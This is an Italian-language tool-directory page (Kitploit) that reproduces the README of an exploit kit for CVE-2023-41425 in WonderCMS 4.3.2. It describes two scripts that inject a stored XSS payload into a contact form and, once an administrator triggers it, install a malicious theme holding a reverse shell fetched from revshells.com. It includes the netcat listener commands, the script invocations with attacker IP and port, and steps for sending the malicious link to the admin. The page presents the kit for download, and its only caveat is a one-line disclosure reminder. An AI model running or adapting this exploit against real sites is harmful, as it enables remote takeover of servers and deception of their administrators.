Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
Strumenti/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Generazione di PayloadExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
31 anno faNon ancora revisionato
Condividi

WonderCMS 4.3.2 Exploit XSS verso RCE

Panoramica

Questi script sfruttano una vulnerabilità XSS (Cross-Site Scripting) in WonderCMS 4.3.2 per ottenere Esecuzione Remota di Codice (RCE). Il payload XSS, quando innescato dall'amministratore, installa automaticamente una reverse shell sul server target sfruttando un modulo tematico malevolo creato ad hoc. La reverse shell viene ottenuta da revshells.com ed eseguita, concedendo all'attaccante accesso remoto al server.


Indice

  • Prerequisiti
  • Script 1: Exploit Automatico
    • Caratteristiche
    • Utilizzo
  • Script 2: Exploit Manuale
    • Caratteristiche
    • Utilizzo
  • Note
  • Licenza

Prerequisiti

Per eseguire con successo uno dei due script, sono necessari i seguenti strumenti e condizioni:

  1. Shell Bash: Entrambi gli script sono scritti per ambienti Linux che utilizzano la shell Bash.
  2. netcat (nc): Utilizzato per rimanere in ascolto della connessione della reverse shell.
  3. Python3: Un semplice server HTTP Python viene utilizzato per ospitare il payload XSS.
  4. WonderCMS 4.3.2: Il target deve eseguire una versione vulnerabile di WonderCMS.
  5. Interazione dell'amministratore: Il payload richiede che un amministratore inneschi l'XSS, che porta all'esecuzione della reverse shell.
  6. revshells.com: Il payload della reverse shell viene scaricato dinamicamente da revshells.com.

Script 1: Exploit Automatico

POC

Pasted image 20241010021603

Caratteristiche

Questa versione dell'exploit controlla automaticamente la presenza di un listener nc attivo, scarica la reverse shell, avvia il server HTTP, invia il payload e attende che l'amministratore inneschi la reverse shell.

  • Configurazione automatica della reverse shell: Scarica una reverse shell pre-generata da revshells.com.
  • Iniezione del payload XSS: Inietta un payload XSS nel modulo di contatto del target.
  • Gestione del server HTTP: Avvia automaticamente un server HTTP Python per ospitare il payload della reverse shell.
  • Controllo del listener nc: Verifica che il listener sia in esecuzione prima di procedere.
  • Invio automatico del payload: Invia il payload automaticamente senza interazione da parte dell'utente.

Utilizzo

  1. Assicurati che il listener nc sia in esecuzione sulla porta specificata:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Esegui lo script con il seguente comando:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Esempio:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Flusso di lavoro

  1. Scarica la reverse shell: Lo script scarica la reverse shell da revshells.com.
  2. Modifica la reverse shell: Lo script della reverse shell viene aggiornato con l'IP e la porta dell'attaccante.
  3. Crea il payload ZIP: Viene creato un file ZIP contenente la reverse shell.
  4. Costruisci il payload XSS: Viene generato e iniettato nel modulo di contatto vulnerabile un payload XSS che installa la reverse shell.
  5. Avvio automatico del server HTTP: Lo script avvia un server HTTP Python per servire il payload malevolo.
  6. Invio automatico del payload: Il payload XSS viene inviato automaticamente all'amministratore.

Script 2: Exploit Manuale

POC

Pasted image 20241010013048

Utilizza l'exploit fornito dallo script nel campo Sito web...

Pasted image 20241010013218

Caratteristiche

Questa versione richiede che l'utente gestisca manualmente il listener nc e l'innesco del payload XSS. È più adatta per scenari in cui i processi automatici non sono desiderabili.

  • Configurazione manuale della reverse shell: L'utente è responsabile di assicurarsi che il listener sia in esecuzione.
  • Innesco manuale dell'XSS: Lo script fornisce il collegamento malevolo da inviare all'amministratore, ma il payload deve essere innescato manualmente.
  • Gestione del server HTTP: Avvia un server HTTP Python per ospitare il payload XSS.

Utilizzo

  1. Assicurati che il listener nc sia in esecuzione sulla porta specificata:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Esegui lo script con il seguente comando:
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Esempio:
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Flusso di lavoro

  1. Scarica la reverse shell: Scarica una reverse shell da revshells.com.
  2. Modifica la reverse shell: Aggiorna la reverse shell con l'IP e la porta dell'attaccante.
  3. Crea il payload ZIP: Crea un file ZIP contenente la reverse shell.
  4. Costruisci il payload XSS: Genera un payload XSS che installa la reverse shell.
  5. Mostra il collegamento malevolo: Mostra il collegamento che deve essere inviato all'amministratore per l'innesco.
  6. Avvia il server HTTP: Avvia un server HTTP Python per ospitare il payload.

Note

  • Interazione dell'amministratore: Entrambi gli exploit si basano sul fatto che l'amministratore di WonderCMS inneschi il payload XSS visitando la pagina vulnerabile. Una volta innescato, la reverse shell viene stabilita con la macchina dell'attaccante.
  • Firewall/IDS/IPS: Prestare attenzione quando si eseguono questi exploit in ambienti protetti da firewall o sistemi di rilevamento delle intrusioni (IDS) che potrebbero bloccare o segnalare attività sospette.
  • Divulgazione responsabile: Se scopri che un target è vulnerabile, segui sempre le linee guida etiche e segnala la vulnerabilità alle parti appropriate.
Scarica lo strumento